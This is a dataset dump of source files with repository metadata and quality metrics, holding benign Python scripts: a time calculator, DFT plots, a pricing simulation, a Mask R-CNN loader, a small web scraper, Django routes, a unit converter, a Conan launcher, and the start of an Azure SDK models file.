hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
4c3e29e2ae1ab7be40f9cfea714aae230e6e4e54
| 2,146
|
py
|
Python
|
Back-End/Python/timers/clock_named_tuple.py
|
ASHISHKUMAR2411/Programming-CookBook
|
9c60655d64d21985ccb4196360858d98344701f9
|
[
"MIT"
] | 25
|
2021-04-28T02:51:26.000Z
|
2022-03-24T13:58:04.000Z
|
Back-End/Python/timers/clock_named_tuple.py
|
ASHISHKUMAR2411/Programming-CookBook
|
9c60655d64d21985ccb4196360858d98344701f9
|
[
"MIT"
] | 1
|
2022-03-03T23:33:41.000Z
|
2022-03-03T23:35:41.000Z
|
Back-End/Python/timers/clock_named_tuple.py
|
ASHISHKUMAR2411/Programming-CookBook
|
9c60655d64d21985ccb4196360858d98344701f9
|
[
"MIT"
] | 15
|
2021-05-30T01:35:20.000Z
|
2022-03-25T12:38:25.000Z
|
from collections import namedtuple
MainTimer = namedtuple('MainTimer', 'new_time_joined, end_period, new_weekday, days')
def add_time(start, duration, start_weekday=None):
weekdays = [
'Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday',
'Saturday', 'Sunday'
]
start_time, period = start.split(' ')
def process_time():
current_hour, current_minute = ([int(t) for t in start_time.split(':')])
end_hour, end_minute = ([int(d) for d in duration.split(':')])
# Adds Current time plus End Time Total
end_hours, end_mins = (current_hour + end_hour, current_minute + end_minute)
# Calculates Total days passed
days = int(end_hours/24)
# Calculates New Time
new_time_array = [str(end_hours % 12 + end_mins // 60), ':', str(end_mins % 60).rjust(2, '0')]
new_time_joined = ''.join(new_time_array)
end_period = [period]
# Clock, calculates the days elapsed
clock = end_hours // 12
if start_weekday:
start_day_idx = weekdays.index(start_weekday.title())
new_weekday = weekdays[(start_day_idx + days % 7) % 7]
else:
new_weekday = False
# Figure out whether is AM or PM
for i in range(clock):
if end_period[-1].lower() == 'am':
end_period.append('PM')
else:
end_period.append('AM')
return MainTimer(new_time_joined, end_period, new_weekday, days)
# Triggers process time function
timed = process_time()
def process_output():
new_time = f'New Time is >>> {timed.new_time_joined} {timed.end_period[-1]}'
if timed.new_weekday:
new_time += f'- {timed.new_weekday} -'
if timed.days == 1 and (period != timed.end_period or timed.end_period == 'AM'):
new_time += ' (new_day)'
elif timed.days > 1:
new_time += f' -Total days: {timed.days}- <<'
return new_time
new_time = process_output()
return new_time
print('---'*30)
x = add_time('10:00 AM', '54:00', 'Monday')
print(x)
print('---'*30)
| 32.029851
| 102
| 0.592265
| 278
| 2,146
| 4.33813
| 0.316547
| 0.087065
| 0.043118
| 0.036484
| 0.074627
| 0.074627
| 0.074627
| 0.074627
| 0.074627
| 0
| 0
| 0.019342
| 0.27726
| 2,146
| 67
| 103
| 32.029851
| 0.758221
| 0.085275
| 0
| 0.136364
| 0
| 0
| 0.136944
| 0.022994
| 0
| 0
| 0
| 0
| 0
| 1
| 0.068182
| false
| 0
| 0.022727
| 0
| 0.159091
| 0.068182
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4c4211ba5dbc8c290d97362485169fd20badaf8a
| 816
|
py
|
Python
|
stanford/sms-tools/lectures/02-DFT/plots-code/idft.py
|
phunc20/dsp
|
e7c496eb5fd4b8694eab0fc049cf98a5e3dfd886
|
[
"MIT"
] | 1
|
2021-03-12T18:32:06.000Z
|
2021-03-12T18:32:06.000Z
|
stanford/sms-tools/lectures/02-DFT/plots-code/idft.py
|
phunc20/dsp
|
e7c496eb5fd4b8694eab0fc049cf98a5e3dfd886
|
[
"MIT"
] | null | null | null |
stanford/sms-tools/lectures/02-DFT/plots-code/idft.py
|
phunc20/dsp
|
e7c496eb5fd4b8694eab0fc049cf98a5e3dfd886
|
[
"MIT"
] | null | null | null |
import matplotlib.pyplot as plt
import numpy as np
import sys
sys.path.append('../../../software/models/')
import dftModel as DFT
import math
k0 = 8.5
N = 64
w = np.ones(N)
x = np.cos(2*np.pi*k0/N*np.arange(-N/2,N/2))
mX, pX = DFT.dftAnal(x, w, N)
y = DFT.dftSynth(mX, pX, N)
plt.figure(1, figsize=(9.5, 5))
plt.subplot(311)
plt.title('positive freq. magnitude spectrum in dB: mX')
plt.plot(np.arange(mX.size), mX, 'r', lw=1.5)
plt.axis([0,mX.size, min(mX), max(mX)+1])
plt.subplot(312)
plt.title('positive freq. phase spectrum: pX')
plt.plot(np.arange(pX.size), pX, 'c', lw=1.5)
plt.axis([0, pX.size,-np.pi,np.pi])
plt.subplot(313)
plt.title('inverse spectrum: IDFT(X)')
plt.plot(np.arange(-N/2, N/2), y,'b', lw=1.5)
plt.axis([-N/2,N/2-1,min(y), max(y)])
plt.tight_layout()
plt.savefig('idft.png')
plt.show()
| 23.314286
| 56
| 0.654412
| 170
| 816
| 3.135294
| 0.382353
| 0.022514
| 0.016886
| 0.022514
| 0.110694
| 0.090056
| 0
| 0
| 0
| 0
| 0
| 0.049519
| 0.109069
| 816
| 34
| 57
| 24
| 0.683631
| 0
| 0
| 0
| 0
| 0
| 0.167892
| 0.030637
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.178571
| 0
| 0.178571
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4c449a22ce009dfff20f9f81e80e2e5aae88a200
| 3,200
|
py
|
Python
|
2021-02-03/2.py
|
Elfenreigen/MCM-2021-C-SJTU-Test
|
98e3b14dbe7bb0ab4a76245d14e4691050704ac9
|
[
"MIT"
] | 1
|
2022-01-24T11:59:40.000Z
|
2022-01-24T11:59:40.000Z
|
2021-02-03/2.py
|
Elfenreigen/MCM-2021-C-SJTU-Test
|
98e3b14dbe7bb0ab4a76245d14e4691050704ac9
|
[
"MIT"
] | null | null | null |
2021-02-03/2.py
|
Elfenreigen/MCM-2021-C-SJTU-Test
|
98e3b14dbe7bb0ab4a76245d14e4691050704ac9
|
[
"MIT"
] | null | null | null |
#####Time Flow Simulation######
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from datetime import timedelta
import datetime
import csv
data=pd.read_excel('CF66-all.xlsx')
data.sort_values(by=['WBL_AUD_DT'],ascending=True,inplace=True)
or_data=pd.read_excel('CF66-ordinary.xlsx')
rule=pd.read_excel('6. Existing pricing strategy.xlsx')
or_name=or_data['WBL_NUM'].unique()
data['ordinary']=0
for i in range(len(data)):
if data.iloc[i,2] in or_name:
data.iloc[i,9]=1
data['volume']=data['CNTR_TYPE']
for i in range(len(data)):
data.iloc[i,10]=int(data.iloc[i,10][0:2])
raw_data=data.groupby('SVVD')
data_to_list=list(raw_data)
raw_list=[]
for i in data_to_list:
raw_list.append(i[1])
total_volume=raw_data['volume'].sum()*1.2
thisrule=rule.groupby(['装港','卸港']).get_group(('营口','海口'))
group_rule=thisrule.groupby(['开始天数','结束天数'])
rule_to_list=list(group_rule)
day_list=[]
rule_list=[]
for i in rule_to_list:
day_list.append(i[0])
rule_list.append(i[1])
m=datetime.timedelta(days=14)
newlist=[]
for i in raw_list:
i['WBL_AUD_DT']=pd.to_datetime(i['WBL_AUD_DT'])
m=datetime.timedelta(days=14)
j=i[i['WBL_AUD_DT']>=i['WBL_AUD_DT'].max()-m]
newlist.append(j)
del(raw_list)
for i in newlist:
i['acc_volume']=i['volume'].cumsum()
i['total_volume']=i['volume'].sum()*1.2
m=datetime.timedelta(days=14)
i['day']=(i['WBL_AUD_DT']-i['WBL_AUD_DT'].max()+m).dt.days
i['acc_rate']=i['acc_volume']/i['total_volume']*100
i['new_AMT']=i['AMT']
for k in range(len(newlist)):
acc_20gp=0
acc_40gp=0
acc_40hq=0
print('k='+str(k))
for i in range(len(day_list)):
print('i='+str(i))
first_day=day_list[i][0]
last_day=day_list[i][1]
flag=[0]*len(rule_list[i])
for j in range(len(newlist[k])):
if newlist[k].iloc[j]['day']>=first_day and newlist[k].iloc[j]['day']<last_day and newlist[k].iloc[j]['ordinary']==1:
for z in range(len(rule_list[i])):
print('z='+str(z))
if newlist[k].iloc[j]['acc_rate']>rule_list[i].iloc[z]['舱位利用率阈值']and rule_list[i].iloc[z]['涨价/降价']=='涨价':
if flag[z]==0:
flag[z]=1
acc_20gp+=rule_list[i].iloc[z]['20GP']
acc_40gp+=rule_list[i].iloc[z]['40GP']
acc_40hq+=rule_list[i].iloc[z]['40HQ']
if newlist[k].iloc[j]['acc_rate']<rule_list[i].iloc[z]['舱位利用率阈值']and rule_list[i].iloc[z]['涨价/降价']=='降价':
if flag[z]==0:
flag[z]=1
acc_20gp-=rule_list[i].iloc[z]['20GP']
acc_40gp-=rule_list[i].iloc[z]['40GP']
acc_40hq-=rule_list[i].iloc[z]['40HQ']
print(flag)
print(acc_20gp)
print(acc_40gp)
print(acc_40hq)
if newlist[k].iloc[j]['CNTR_TYPE']=='20GP':
newlist[k].iloc[j,15]+=acc_20gp
if newlist[k].iloc[j]['CNTR_TYPE']=='40GP':
newlist[k].iloc[j,15]+=acc_40gp
if newlist[k].iloc[j]['CNTR_TYPE']=='40HQ':
newlist[k].iloc[j,15]+=acc_40hq
for i in newlist:
print('revenue:'+str(i['AMT'].sum()))
print('newrevenue:'+str(i['new_AMT'].sum()))
newlist[0].to_csv('voyage1.csv')
newlist[1].to_csv('voyage2.csv')
newlist[2].to_csv('voyage3.csv')
| 27.118644
| 121
| 0.62375
| 567
| 3,200
| 3.349206
| 0.190476
| 0.039494
| 0.056872
| 0.075303
| 0.3802
| 0.290153
| 0.220642
| 0.184308
| 0.184308
| 0.184308
| 0
| 0.037961
| 0.160313
| 3,200
| 117
| 122
| 27.350427
| 0.668776
| 0.00625
| 0
| 0.123596
| 0
| 0
| 0.14941
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.067416
| 0
| 0.067416
| 0.101124
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4c497bbd6391fbc0eaad2b9548fcee8c07a53d5e
| 2,348
|
py
|
Python
|
samples/cmk/test.py
|
jasstionzyf/Mask_RCNN
|
971a9dd9be1f9716e6f7c23b959bd57079cd93eb
|
[
"MIT"
] | null | null | null |
samples/cmk/test.py
|
jasstionzyf/Mask_RCNN
|
971a9dd9be1f9716e6f7c23b959bd57079cd93eb
|
[
"MIT"
] | null | null | null |
samples/cmk/test.py
|
jasstionzyf/Mask_RCNN
|
971a9dd9be1f9716e6f7c23b959bd57079cd93eb
|
[
"MIT"
] | null | null | null |
import os
import sys
import json
import datetime
import numpy as np
import glob
import skimage
from PIL import Image as pil_image
import cv2
import cv2
def locationToMask(locations=None,height=None,width=None):
mask = np.zeros([height, width, len(locations)],
dtype=np.uint8)
for index,location in enumerate(locations):
x1, y1, x2, y2 = location
mask[y1:y2+1,x1:x2+1,index]=1
print(mask[:,:,index])
return mask.astype(np.bool), np.ones([mask.shape[-1]], dtype=np.int32)
def load_cmk(dataset_dir, subset):
folder=os.path.join(dataset_dir, subset)
imagesPattern=folder+'/*.jpg'
for image_path in glob.glob(imagesPattern):
print(image_path)
img = cv2.imread(image_path)
height,width = img.shape[:2]
imageId=os.path.basename(image_path).replace('.jpg','')
print(imageId)
#
# self.add_image(
# "balloon",
# image_id=a['filename'], # use file name as a unique image id
# path=image_path,
# width=width, height=height,
# polygons=polygons)
locationsFile='%s/%s.txt' % (folder,imageId)
locations=[]
with open(locationsFile) as fp:
lines = fp.readlines()
for line in lines:
line = line.replace('\n', '')
if len(line.split(' ')) < 5:
break
classIndex, xcen, ycen, w, h = line.strip().split(' ')
xmin = max(float(xcen) - float(w) / 2, 0)
xmax = min(float(xcen) + float(w) / 2, 1)
ymin = max(float(ycen) - float(h) / 2, 0)
ymax = min(float(ycen) + float(h) / 2, 1)
xmin = int(width * xmin)
xmax = int(width * xmax)
ymin = int(height * ymin)
ymax = int(height * ymax)
location=(xmin,ymin,xmax,ymax)
locations.append(location)
print(locations)
dataset_dir='/Volumes/v2/data/mlib_data/dataset/cmk/images_v2/'
subset='val'
load_cmk(dataset_dir=dataset_dir,subset=subset)
locations=[(2,3,5,7),(8,8,9,9)]
height=10
width=10
# mask,classIds=locationToMask(locations=locations,height=height,width=width)
# print(mask)
# print(classIds)
| 18.488189
| 77
| 0.559199
| 294
| 2,348
| 4.408163
| 0.377551
| 0.03858
| 0.037037
| 0.026235
| 0.049383
| 0
| 0
| 0
| 0
| 0
| 0
| 0.025862
| 0.308348
| 2,348
| 126
| 78
| 18.634921
| 0.772167
| 0.117121
| 0
| 0.037736
| 0
| 0
| 0.036479
| 0.023833
| 0
| 0
| 0
| 0
| 0
| 1
| 0.037736
| false
| 0
| 0.188679
| 0
| 0.245283
| 0.075472
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4c49c1d6c63daaf7fca0ba56abe4608634b5eea3
| 371
|
py
|
Python
|
myBeautifulSoup.py
|
ZhongXinWang/python
|
4cf3ecdc9d9e811e777c6d8408a8319097cfdec3
|
[
"Apache-2.0"
] | null | null | null |
myBeautifulSoup.py
|
ZhongXinWang/python
|
4cf3ecdc9d9e811e777c6d8408a8319097cfdec3
|
[
"Apache-2.0"
] | null | null | null |
myBeautifulSoup.py
|
ZhongXinWang/python
|
4cf3ecdc9d9e811e777c6d8408a8319097cfdec3
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#Author:Winston.Wang
import requests
from bs4 import BeautifulSoup
print(dir(BeautifulSoup))
url = 'http://www.baidu.com';
with requests.get(url) as r:
r.encoding='utf-8'
soup = BeautifulSoup(r.text)
#格式化
pret = soup.prettify();
u = soup.select('#u1 a')
for i in u:
print("名称:%s,地址:%s" % (i.getText(),i.get('href')))
| 24.733333
| 52
| 0.660377
| 61
| 371
| 4.016393
| 0.721311
| 0.032653
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.01548
| 0.12938
| 371
| 15
| 52
| 24.733333
| 0.743034
| 0.175202
| 0
| 0
| 0
| 0
| 0.148515
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.181818
| 0
| 0.181818
| 0.181818
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4c4aaf6acc32d2b6cfe7656b0adf41a02eba514c
| 869
|
py
|
Python
|
blogsNewsModule/urls.py
|
adityakekare/NewsAPIDjango
|
47ff0c69e3d48c10a257c8221916ccd2fdaf9abb
|
[
"MIT"
] | 1
|
2020-10-14T17:13:45.000Z
|
2020-10-14T17:13:45.000Z
|
blogsNewsModule/urls.py
|
adityakekare/NewsAPIDjango
|
47ff0c69e3d48c10a257c8221916ccd2fdaf9abb
|
[
"MIT"
] | null | null | null |
blogsNewsModule/urls.py
|
adityakekare/NewsAPIDjango
|
47ff0c69e3d48c10a257c8221916ccd2fdaf9abb
|
[
"MIT"
] | null | null | null |
from django.urls import path, include
from . import views
urlpatterns = [
path("", views.newsView, name="home"),
path("createBlog", views.CreateBlogView.as_view(), name="createBlog"),
path("myBlogs", views.PostListView.as_view(), name="myBlogs"),
path("single/<int:pk>", views.PostDetailView.as_view(), name="single"),
path("subscribe", views.subscribeView,name="subscribe"),
path("about", views.aboutView, name="about"),
path("edit/<int:pk>", views.UpdateBlogView.as_view(), name="edit"),
path("delete/<int:pk>", views.DeleteBlogView.as_view(), name="delete"),
path("like/<int:pk>", views.LikeView, name="like_post"),
# API urls for superuser
path("api/create/", views.APICreateView.as_view()),
path("api/posts/", views.APIListView.as_view()),
path("api/posts/<int:pk>", views.APIDetailView.as_view()),
]
| 41.380952
| 75
| 0.667434
| 109
| 869
| 5.238532
| 0.366972
| 0.084063
| 0.087566
| 0.045534
| 0.063047
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.130035
| 869
| 21
| 76
| 41.380952
| 0.755291
| 0.025316
| 0
| 0
| 0
| 0
| 0.219858
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.125
| 0
| 0.125
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4c4ab4331dee2d296afdfa6d9310db62fe1c4c93
| 3,133
|
py
|
Python
|
unitClass.py
|
MatthewZheng/UnitsPlease
|
5911267b5a0a78dd4d833c6be46e89caaf98c200
|
[
"MIT"
] | null | null | null |
unitClass.py
|
MatthewZheng/UnitsPlease
|
5911267b5a0a78dd4d833c6be46e89caaf98c200
|
[
"MIT"
] | null | null | null |
unitClass.py
|
MatthewZheng/UnitsPlease
|
5911267b5a0a78dd4d833c6be46e89caaf98c200
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python
_author_ = "Matthew Zheng"
_purpose_ = "Sets up the unit class"
class Unit:
'''This is a class of lists'''
def __init__(self):
self.baseUnits = ["m", "kg", "A", "s", "K", "mol", "cd", "sr", "rad"]
self.derivedUnits = ["Hz", "N", "Pa", "J", "W", "C", "V", "F", "ohm", "S", "Wb", "T", "H", "°C", "lm", "lx", "Bq", "Gy", "Sv", "kat"]
def baseCheck(self, userList):
'''Converts elements in str list to base units'''
converted = []
for i in (userList):
isSquared = False
unitPreIndex = ""
#checks if it has a carat in the expression
for ind, j in enumerate(list(i)):
if j == "^":
isSquared = True
unitPreIndex = ''.join(list(i)[:ind])
break
#converts non-unary unit to base unit and checks for squared variables
while(i not in (self.baseUnits or self.derivedUnits) and len(list(i)) != 1 and unitPreIndex not in (self.baseUnits or self.derivedUnits) and len(unitPreIndex) != 1):
orgNameList = list(i)
#identify prefix removed
self.idPrefix = orgNameList.pop(0)
i = ''.join(orgNameList)
print("The program removed the prefix %s and converted your unit to it's base unit: %s." % (self.idPrefix, i))
#checks if it is a special unit
if(i not in (self.baseUnits and self.derivedUnits)):
#append in case for special units
break
else:
#append in case for base unit
break
#Appends base unit
if(i in (self.baseUnits or self.derivedUnits) and isSquared == False):
converted.append(i)
elif(isSquared == True):
toAppend = []
numReps = []
#run once to get number of times the unit is squared
for index, val in enumerate(list(i)):
if val == "^":
numStart = index+1
numReps.append(''.join(list(i)[numStart:]))
toAppend.append(''.join(list(i)[:index]))
break
#convert numReps into an int
intReps = int(''.join(numReps))
#append number of units specified by the carat
for l in range (intReps):
if(''.join(toAppend) not in (self.baseUnits or self.derivedUnits)):
print("Your variable %s was not in the commonly used units OR it is a derived unit such as N, newtons -- we will add it to the product regardless." % ''.join(toAppend))
converted.append(''.join(toAppend))
#Exception for special units
else:
print("Your variable %s was not in the commonly used units OR it is a derived unit such as N, newtons -- we will add it to the product regardless." % i)
converted.append(i)
return(converted)
| 42.917808
| 192
| 0.509416
| 372
| 3,133
| 4.271505
| 0.365591
| 0.022026
| 0.0472
| 0.045312
| 0.273128
| 0.237885
| 0.237885
| 0.192574
| 0.192574
| 0.139711
| 0
| 0.002052
| 0.377913
| 3,133
| 72
| 193
| 43.513889
| 0.812724
| 0.151931
| 0
| 0.177778
| 0
| 0.066667
| 0.168501
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.044444
| false
| 0
| 0
| 0
| 0.066667
| 0.066667
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4c4da9a43e106d41a3befb2cd7c5b3dab87492dd
| 274
|
py
|
Python
|
conans/server/server_launcher.py
|
Wonders11/conan
|
28ec09f6cbf1d7e27ec27393fd7bbc74891e74a8
|
[
"MIT"
] | 6,205
|
2015-12-01T13:40:05.000Z
|
2022-03-31T07:30:25.000Z
|
conans/server/server_launcher.py
|
Wonders11/conan
|
28ec09f6cbf1d7e27ec27393fd7bbc74891e74a8
|
[
"MIT"
] | 8,747
|
2015-12-01T16:28:48.000Z
|
2022-03-31T23:34:53.000Z
|
conans/server/server_launcher.py
|
Mattlk13/conan
|
005fc53485557b0a570bb71670f2ca9c66082165
|
[
"MIT"
] | 961
|
2015-12-01T16:56:43.000Z
|
2022-03-31T13:50:52.000Z
|
from conans.server.launcher import ServerLauncher
from conans.util.env_reader import get_env
launcher = ServerLauncher(server_dir=get_env("CONAN_SERVER_HOME"))
app = launcher.server.root_app
def main(*args):
launcher.launch()
if __name__ == "__main__":
main()
| 18.266667
| 66
| 0.762774
| 37
| 274
| 5.243243
| 0.567568
| 0.103093
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.131387
| 274
| 14
| 67
| 19.571429
| 0.815126
| 0
| 0
| 0
| 0
| 0
| 0.091241
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.125
| false
| 0
| 0.25
| 0
| 0.375
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4c4dd7e5ec767d2a5876ed8c611d8ac4661dfd09
| 153,586
|
py
|
Python
|
sdk/videoanalyzer/azure-mgmt-videoanalyzer/azure/mgmt/videoanalyzer/models/_models.py
|
praveenkuttappan/azure-sdk-for-python
|
4b79413667b7539750a6c7dde15737013a3d4bd5
|
[
"MIT"
] | 2,728
|
2015-01-09T10:19:32.000Z
|
2022-03-31T14:50:33.000Z
|
sdk/videoanalyzer/azure-mgmt-videoanalyzer/azure/mgmt/videoanalyzer/models/_models.py
|
v-xuto/azure-sdk-for-python
|
9c6296d22094c5ede410bc83749e8df8694ccacc
|
[
"MIT"
] | 17,773
|
2015-01-05T15:57:17.000Z
|
2022-03-31T23:50:25.000Z
|
sdk/videoanalyzer/azure-mgmt-videoanalyzer/azure/mgmt/videoanalyzer/models/_models.py
|
v-xuto/azure-sdk-for-python
|
9c6296d22094c5ede410bc83749e8df8694ccacc
|
[
"MIT"
] | 1,916
|
2015-01-19T05:05:41.000Z
|
2022-03-31T19:36:44.000Z
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from azure.core.exceptions import HttpResponseError
import msrest.serialization
class Resource(msrest.serialization.Model):
"""Common fields that are returned in the response for all Azure Resource Manager resources.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Fully qualified resource ID for the resource. Ex -
/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}.
:vartype id: str
:ivar name: The name of the resource.
:vartype name: str
:ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or
"Microsoft.Storage/storageAccounts".
:vartype type: str
:ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy
information.
:vartype system_data: ~video_analyzer.models.SystemData
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'system_data': {'readonly': True},
}
_attribute_map = {
